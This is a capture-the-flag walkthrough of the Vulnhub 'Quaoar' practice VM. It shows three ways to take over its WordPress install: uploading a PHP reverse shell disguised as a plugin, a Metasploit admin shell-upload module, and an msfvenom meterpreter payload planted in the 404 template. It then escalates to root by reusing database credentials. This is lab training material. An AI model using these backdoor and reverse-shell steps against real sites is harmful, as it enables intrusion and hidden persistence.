Quaoar VM Walkthrough- (Vulnhub.com) Three Different Techniques to exploit a machine
Hackfest 2016- Quaoar VMWalkthrough / Writeup
This VM was made for hack fest 2016 and is listed as very easy. I had this one done in under an two hour with three different Techniques.
Welcome to Quaoar This is a vulnerable machine which is created for http://hackfest.ca/
Difficulty : Very Easy
Here are the tools you can research to help you to own this machine. nmap, dirb / dirbuster / BurpSmartBuster, nikto, wpscan, hydra Your Brain Coffee Google :)
Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box
Different Techniques to Exploit :
Reverse Shell Plugin Upload
Metasploit Wordpress Exploit Payload
Payload post in 404 page
So Start with 1st Technique:-
- Reverse Shell Plugin Upload
Let’s get started with old faithful, arp-scan for it’s network location.
Command : arp-scan -l
Followed by the obligatory NMAP, lots of interesting things going on here…
Command : nmap -p- (ip)
Although there was lots to see, I went straight for port 80 due to the self proclaimed ‘very easy’ difficulty and fired up nikto. Immediately I can see this is a word press install.
Command : nikto -h (ip)
So firing up WPScan and enumerating for usernames. we get the default admin entry.
Command : Wpscan — url www.example.com — enumerate u
Where there is a default admin entry there is highly likely to be a default admin password (admin:admin). I didn’t even look at the landing page at this point, going directly to /wordpress/wp-login.php and trying out my theory..
And as you can see we get straight into the WordPress portal..
At this stage I decided to create a WordPress plug-in that I could use to generate a reverse shell. Taking the out of the box php back-door from Kali (/usr/share/webshell/php/php-reverse-shell.php) and making the following amendments to it…
Change the ip (local ip) and port on reverse shell php and zip the updated file.
The headers are required so when you zip the php file , it will recognise it as a WordPress plug-in and install it. You can see in the below screen grab rev.zip
But if you go to installed plug-ins after this you will see it has actually installed with the plug-in name. Great for obfuscating your back door.
Netcat its on listen mode
Command : nc -nlvvp port(4444)
Activating the plug-in from here and catching it with a net-cat listener.
A recursive lookup through the /home directories and we find our first flag.
Now I started this post by saying it had many similarities to Stapler, well one of this similarities was the wp-config containing mysql credentials. The thing with these creds is that they indicate not mysql but actual root credentials.
So assuming shared credentials between the two accounts:
Try to root and we are in as root. There is a flag in /root/ and we already had the other.
Command : su root
And for the last flag, Check in cron php file.
Location : cd /etc/cron.d/
Command : cat php5
- Metasploit Wordpress Payload Exploit
Using the admin username, i was able to access the wordpress admin dashboard with the password ‘admin’.
From here, it was then possible to get a reverse shell using metasploit (exploit/unix/webapp/wp_admin_shell_upload).
Command : use exploit/unix/webapp/wp_admin_shell_upload
Command : show options
After Session created follow above steps to get the flag :)
- Reverse TCP Payload post in 404 page
I created a php file with the meterpreter payload as shown in the following image:
Command : msfvenom -p php/meterpreter/reverse_tcp LHOST=[ip] LPORT=[PORT] -f raw > shell.php
Then I added the shell code to the 404 page using the wordpress theme editor.
Wordpress Admin > Appearance > Editor > Template
I started msfconsole
and set up the listener.
Command :
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
Once I finished, I just forced a 404 error on wordpress by fetching an unexisting post id.
Yupieee :) I got a shell to the server
So now follow 1st Technique to grep flags :)
Job Done……………..
Hope you like it , Thanks :)